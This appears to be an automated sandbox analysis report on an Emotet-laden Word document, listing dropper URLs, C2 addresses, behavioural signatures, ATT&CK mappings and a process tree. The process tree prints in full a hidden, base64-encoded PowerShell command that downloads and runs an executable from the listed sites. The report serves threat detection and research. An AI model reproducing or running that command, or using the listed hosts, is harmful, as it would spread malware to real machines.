Analysis

  • max time kernel
    25s
  • resource
    win10v191014
  • submitted
    28-01-2020 19:06

General

  • Target

    76288b03aada28f313d41a8856e42320372dfc03b255335b3d8c0427cb01c4a1.doc

  • Sample

    200128-q3x26qlz9e

  • SHA256

    76288b03aada28f313d41a8856e42320372dfc03b255335b3d8c0427cb01c4a1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://earlingramjr.com/wp-admin/jMVDLv8/

exe.dropper

http://empower4talent.com/calendar/uf475/

exe.dropper

http://emyrs-eg.lehmergroup.com/YaePG8Heh9/

exe.dropper

http://expressdocuments.org/egxoii/fO852/

exe.dropper

http://fastagindia.hapus.app/cgi-bin/IJ/

Extracted

Family

emotet

C2

70.184.112.55:80

5.34.158.102:80

144.139.91.187:80

12.162.84.2:8080

72.47.209.128:80

74.50.51.115:7080

184.172.27.82:8080

202.62.39.111:80

181.10.204.106:80

91.72.179.214:80

203.130.0.69:80

189.201.197.98:8080

201.213.32.59:80

204.225.249.100:7080

212.71.237.140:8080

94.176.234.118:443

201.213.100.141:8080

31.16.195.72:80

185.94.252.12:80

146.255.96.214:443

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\76288b03aada28f313d41a8856e42320372dfc03b255335b3d8c0427cb01c4a1.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:4904
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABHAHIAcQBwAGsAaQB1AHkAdAA9ACcAQQByAGYAdgBsAGcAdABrAG8AcgBiAGMAcQAnADsAJABQAHAAcwBoAGgAbgBvAHIAdgBoAHYAcQBvACAAPQAgACcAMwA5ACcAOwAkAE0AbQBxAGMAcgBkAHgAcgBoAHkAaABiAD0AJwBSAHoAYQBpAG4AdwBtAGEAdgBvAHgAZAAnADsAJABJAHUAbAB0AGYAeABkAHgAeQBvAHcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFAAcABzAGgAaABuAG8AcgB2AGgAdgBxAG8AKwAnAC4AZQB4AGUAJwA7ACQARQBvAGEAcABsAG0AaQBsAGMAZQBpAD0AJwBOAG8AbgB6AHIAdAB0AGEAYgBiAGkAbgAnADsAJABOAGwAaQB1AHAAaAB6AHYAeQA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAGUAQgBjAEwAaQBFAG4AVAA7ACQAQgBjAG8AZQB4AHYAZABzAGUAYQBmAD0AJwBoAHQAdABwADoALwAvAGUAYQByAGwAaQBuAGcAcgBhAG0AagByAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBqAE0AVgBEAEwAdgA4AC8AKgBoAHQAdABwADoALwAvAGUAbQBwAG8AdwBlAHIANAB0AGEAbABlAG4AdAAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8AdQBmADQANwA1AC8AKgBoAHQAdABwADoALwAvAGUAbQB5AHIAcwAtAGUAZwAuAGwAZQBoAG0AZQByAGcAcgBvAHUAcAAuAGMAbwBtAC8AWQBhAGUAUABHADgASABlAGgAOQAvACoAaAB0AHQAcAA6AC8ALwBlAHgAcAByAGUAcwBzAGQAbwBjAHUAbQBlAG4AdABzAC4AbwByAGcALwBlAGcAeABvAGkAaQAvAGYATwA4ADUAMgAvACoAaAB0AHQAcAA6AC8ALwBmAGEAcwB0AGEAZwBpAG4AZABpAGEALgBoAGEAcAB1AHMALgBhAHAAcAAvAGMAZwBpAC0AYgBpAG4ALwBJAEoALwAnAC4AIgBzAGAAUABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEwAcgBiAGYAbgB3AGoAbQBzAHkAPQAnAEUAbQBnAHgAdwBhAHAAYwB5AG0AaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwB0AGEAZABlAGoAZABoAHUAawB5AG8AIABpAG4AIAAkAEIAYwBvAGUAeAB2AGQAcwBlAGEAZgApAHsAdAByAHkAewAkAE4AbABpAHUAcABoAHoAdgB5AC4AIgBkAGAATwBXAG4AYABMAGAAbwBBAGQARgBpAEwAZQAiACgAJABDAHQAYQBkAGUAagBkAGgAdQBrAHkAbwAsACAAJABJAHUAbAB0AGYAeABkAHgAeQBvAHcAKQA7ACQASgBuAG4AZABtAHMAYgBpAGQAPQAnAEIAeQB1AGIAawBiAHYAcABoAGIAcABnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQASQB1AGwAdABmAHgAZAB4AHkAbwB3ACkALgAiAEwAYABFAGAATgBnAFQASAAiACAALQBnAGUAIAAzADUANwA3ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGAAQQBSAHQAIgAoACQASQB1AGwAdABmAHgAZAB4AHkAbwB3ACkAOwAkAEkAeAB6AGsAeQBqAG0AegBkAD0AJwBKAGYAZwBxAGgAYgBwAG0AdwB4AGYAbwBzACcAOwBiAHIAZQBhAGsAOwAkAFQAaABkAHUAaABzAHkAaABrAGQAaQA9ACcASwBvAHoAcgBzAG8AcwBxAGoAcgB0AG8AcQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABIAGMAaQBoAG4AaABxAGYAdgA9ACcAQwBrAHgAdgBtAHkAaQByACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4472
    • C:\Users\Admin\39.exe
      "C:\Users\Admin\39.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4652
      • C:\Users\Admin\39.exe
        --93b58930
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        PID:4632

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\39.exe
  • C:\Users\Admin\39.exe
  • C:\Users\Admin\39.exe
  • memory/4632-13-0x00000000004A0000-0x00000000004B6000-memory.dmp
    Filesize

    88KB

  • memory/4632-14-0x0000000000400000-0x0000000000421000-memory.dmp
    Filesize

    132KB

  • memory/4652-11-0x00000000004B0000-0x00000000004C6000-memory.dmp
    Filesize

    88KB

  • memory/4904-5-0x0000022764961000-0x0000022764964000-memory.dmp
    Filesize

    12KB